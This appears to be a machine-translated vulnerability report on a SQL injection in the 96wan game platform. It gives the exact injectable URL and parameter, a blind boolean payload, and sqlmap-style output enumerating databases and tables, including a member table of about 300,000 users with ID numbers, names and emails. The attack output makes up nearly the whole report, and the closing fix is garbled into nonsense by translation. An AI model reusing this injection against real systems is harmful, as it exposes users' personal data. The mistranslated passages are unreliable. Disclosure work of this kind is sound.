96wan game platform storage vulnerability # Involving 0.3 million users (ID card # name # email, etc)
Injection address
# SQL Injection URL: http://www.96wan.com/websiteapi/website_serverlist? Gid = 6 parameter gid controllable
Six databases leaked
Code Region
Parameter: gid (GET)
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: gid = 6 AND 1429 = 1429
---
Back-end DBMS: MySQL 5
Available databases [6]:
[*] '96wan _ ucenter'
[*] '96wan _ web' // master site database
[*] '96wan _ wp'
[*] Information_schema
[*] Mysql
[*] Performance_schema
# Directly check the master database information without in-depth information (0.3 million of member sensitive information is leaked)
Code Region
Database: 96wan_web
+ ------------------------- + --------- +
| Table | Entries |
+ ------------------------- + --------- +
| '96wan _ game_log '| 4680784 |
| '96wan _ login_log '| 3916792 |
| '96wan _ member_info '| 309322 |
| '96wan _ register_log '| 308966 |
| '96wan _ newcart' | 155681 |
| '96wan _ newcard2 '| 150832 |
| '96wan _ channel_member '| 93985 |
| '96 Wan _ pay_log '| 75946 |
| '96wan _ pay_ OK '| 44113 |
| '96wan _ pay_togam' | 44113 |
| Ku36_game_log | 1, 31458 |
| '96 Wan _ code_log '| 19938 |
| '96wan _ lhzs_card '| 12349 |
| Ku36_member_information | 4924 |
| '96wan _ channel_info '| 3797 |
| '96wan _ region' | 3144 |
| '96wan _ verify_email '| 1901 |
| '96wan _ game_server '| 622 |
| '96wan _ forgetpwd' | 404 |
| '96wan _ channel' | 380 |
| '96wan _ City' | 340 |
| '96wan _ article' | 311 |
| '96wan _ access' | 197 |
| '96wan _ friendlink' | 114 |
| '96wan _ union_channel '| 102 |
| '96wan _ password_appeal' | 97 |
| '96wan _ lhzs_usecard '| 96 |
| '96wan _ node' | 82 |
| '96wan _ test_account '| 50 |
| '96wan _ phone_code_log '| 46 |
| '96wan _ union_members '| 40 |
| '96wan _ province '| 34 |
| '96wan _ channel_source '| 33 |
| '96wan _ game' | 25 |
| '96wan _ pay_type '| 20 |
| '96wan _ slidepic '| 19 |
| '96wan _ role_user '| 17 |
| '96wan _ tg_pass '| 16 |
| '96wan _ pay_test '| 12 |
| '96wan _ notice' | 7 |
| '96wan _ singlepage' | 7 |
| '96wan _ group' | 6 |
| '96wan _ channel_ts '| 5 |
| '96wan _ role' | 5 |
| '96wan _ user' | 4 |
| '96wan _ category '| 3 |
| '96wan _ dept' | 3 |
| '96wan _ groups '| 3 |
| '96wan _ union '| 2 |
| '96wan _ card' | 1 |
| '96wan _ Code' | 1 |
| '96wan _ phone_code '| 1 |
| '96wan _ sygame' | 1 |
| '96wan _ tg_paytype' | 1 |
+ ------------------------- + --------- +
Solution:
Controllable parameter code farming filtering.